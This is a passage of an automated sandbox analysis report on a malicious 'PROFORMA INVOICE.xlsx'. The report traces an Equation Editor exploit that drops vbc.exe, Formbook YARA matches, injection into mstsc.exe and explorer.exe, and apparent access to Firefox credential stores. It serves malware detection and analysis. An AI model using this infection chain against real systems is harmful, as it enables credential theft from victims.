          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025D351F11_2_025D351F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025EC5F011_2_025EC5F0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_02683A8311_2_02683A83
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025F7B0011_2_025F7B00
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_0265DBDA11_2_0265DBDA
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_0267CBA411_2_0267CBA4
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025DC85C11_2_025DC85C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025F286D11_2_025F286D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_0266F8EE11_2_0266F8EE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_0265595511_2_02655955
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025E69FE11_2_025E69FE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_0267098E11_2_0267098E
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025D29B211_2_025D29B2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025EEE4C11_2_025EEE4C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_02602E2F11_2_02602E2F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025FDF7C11_2_025FDF7C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025E0F3F11_2_025E0F3F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025DCD5B11_2_025DCD5B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_02600D3B11_2_02600D3B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_0266FDDD11_2_0266FDDD
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_000CDC2011_2_000CDC20
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_000C927B11_2_000C927B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_000C928011_2_000C9280
          Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 98%
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: mozglue.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: winsqlite3.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: winsqlite3.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.3842f58.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.3842f58.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.27da9ec.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
          Source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000000.1175795140.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000000.1175795140.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.995456995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.995456995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.999123801.0000000003842000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.999123801.0000000003842000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.1028504490.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.1028504490.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.1039502497.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.1039502497.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.1069951838.0000000000380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.1069951838.0000000000380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000000.1174695923.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000000.1174695923.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.995827598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.995827598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.1178294756.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.1178294756.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.1178354979.0000000000260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.1178354979.0000000000260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 025CDF5C appears 107 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 02613F92 appears 108 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 0261373B appears 238 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 0263F970 appears 81 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 025CE2A8 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 008D3F92 appears 43 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 008D373B appears 81 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0088DF5C appears 54 times
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041A310 NtCreateFile,9_2_0041A310
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041A3C0 NtReadFile,9_2_0041A3C0
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041A440 NtClose,9_2_0041A440
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041A4F0 NtAllocateVirtualMemory,9_2_0041A4F0
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041A30C NtCreateFile,9_2_0041A30C
          Source: C:\Users\Public\vbc.exeCode function: 9_2_008800C4 NtCreateFile,LdrInitializeThunk,9_2_008800C4
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00880048 NtProtectVirtualMemory,LdrInitializeThunk,9_2_00880048
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00880078 NtResumeThread,LdrInitializeThunk,9_2_00880078
          Source: C:\Users\Public\vbc.exeCode function: 9_2_008807AC NtCreateMutant,LdrInitializeThunk,9_2_008807AC
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0087F9F0 NtClose,LdrInitializeThunk,9_2_0087F9F0
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0087F900 NtReadFile,LdrInitializeThunk,9_2_0087F900
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0087FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_0087FAD0
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0087FAE8 NtQueryInformationProcess,LdrInitializeThunk,9_2_0087FAE8
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0087FBB8 NtQueryInformationToken,LdrInitializeThunk,9_2_0087FBB8
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0087FB68 NtFreeVirtualMemory,LdrInitializeThunk,9_2_0087FB68
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0087FC90 NtUnmapViewOfSection,LdrInitializeThunk,9_2_0087FC90
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0087FC60 NtMapViewOfSection,LdrInitializeThunk,9_2_0087FC60
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0087FD8C NtDelayExecution,LdrInitializeThunk,9_2_0087FD8C
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0087FDC0 NtQuerySystemInformation,LdrInitializeThunk,9_2_0087FDC0
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0087FEA0 NtReadVirtualMemory,LdrInitializeThunk,9_2_0087FEA0
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0087FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_0087FED0
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0087FFB4 NtCreateSection,LdrInitializeThunk,9_2_0087FFB4
          Source: C:\Users\Public\vbc.exeCode function: 9_2_008810D0 NtOpenProcessToken,9_2_008810D0
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00880060 NtQuerySection,9_2_00880060
          Source: C:\Users\Public\vbc.exeCode function: 9_2_008801D4 NtSetValueKey,9_2_008801D4
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0088010C NtOpenDirectoryObject,9_2_0088010C
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00881148 NtOpenThread,9_2_00881148
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025C0078 NtResumeThread,LdrInitializeThunk,11_2_025C0078
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025C00C4 NtCreateFile,LdrInitializeThunk,11_2_025C00C4
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025C07AC NtCreateMutant,LdrInitializeThunk,11_2_025C07AC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025BFA50 NtEnumerateValueKey,LdrInitializeThunk,11_2_025BFA50
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025BFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_025BFAD0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025BFAE8 NtQueryInformationProcess,LdrInitializeThunk,11_2_025BFAE8
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025BFAB8 NtQueryValueKey,LdrInitializeThunk,11_2_025BFAB8
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025BFB50 NtCreateKey,LdrInitializeThunk,11_2_025BFB50
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025BFB68 NtFreeVirtualMemory,LdrInitializeThunk,11_2_025BFB68
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025BFBB8 NtQueryInformationToken,LdrInitializeThunk,11_2_025BFBB8
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025BF900 NtReadFile,LdrInitializeThunk,11_2_025BF900
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025BF9F0 NtClose,LdrInitializeThunk,11_2_025BF9F0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025BFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_025BFED0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025BFEA0 NtReadVirtualMemory,LdrInitializeThunk,11_2_025BFEA0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025BFFB4 NtCreateSection,LdrInitializeThunk,11_2_025BFFB4
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025BFC60 NtMapViewOfSection,LdrInitializeThunk,11_2_025BFC60
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025BFC90 NtUnmapViewOfSection,LdrInitializeThunk,11_2_025BFC90
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025BFDC0 NtQuerySystemInformation,LdrInitializeThunk,11_2_025BFDC0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025BFD8C NtDelayExecution,LdrInitializeThunk,11_2_025BFD8C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025C0048 NtProtectVirtualMemory,11_2_025C0048
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025C0060 NtQuerySection,11_2_025C0060
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025C10D0 NtOpenProcessToken,11_2_025C10D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025C1148 NtOpenThread,11_2_025C1148
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025C010C NtOpenDirectoryObject,11_2_025C010C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025C01D4 NtSetValueKey,11_2_025C01D4
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025BFA20 NtQueryInformationFile,11_2_025BFA20
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025BFBE8 NtQueryVirtualMemory,11_2_025BFBE8
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025BF8CC NtWaitForSingleObject,11_2_025BF8CC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025BF938 NtWriteFile,11_2_025BF938
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025C1930 NtSetContextThread,11_2_025C1930
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025BFE24 NtWriteVirtualMemory,11_2_025BFE24
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025BFF34 NtQueueApcThread,11_2_025BFF34
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025BFFFC NtCreateProcessEx,11_2_025BFFFC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025BFC48 NtSetInformationFile,11_2_025BFC48
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025C0C40 NtGetContextThread,11_2_025C0C40
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025BFC30 NtOpenProcess,11_2_025BFC30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025BFD5C NtEnumerateKey,11_2_025BFD5C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025C1D80 NtSuspendThread,11_2_025C1D80
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_000DA310 NtCreateFile,11_2_000DA310
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_000DA3C0 NtReadFile,11_2_000DA3C0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_000DA440 NtClose,11_2_000DA440
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_000DA4F0 NtAllocateVirtualMemory,11_2_000DA4F0
          Source: C:\Windows\SysWOW64\mstsc.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install DirectoryJump to behavior
          Source: vbc[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: dDqpEdJEtzi.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$PROFORMA INVOICE.xlsxJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@13/16@3/3
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: explorer.exe, 0000000A.00000000.1055600196.0000000003B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: .VBPud<_
          Source: PROFORMA INVOICE.xlsxVirustotal: Detection: 35%
          Source: PROFORMA INVOICE.xlsxReversingLabs: Detection: 24%
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................X.......:;......................0.......#.......................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................X.......U;......................0.......#.........}.............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................X.......};......................0......./.......................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................X........;......................0......./.........}.............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................X........;......................0.......;...............|.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................X........;......................0.......;.........}.............................Jump to behavior
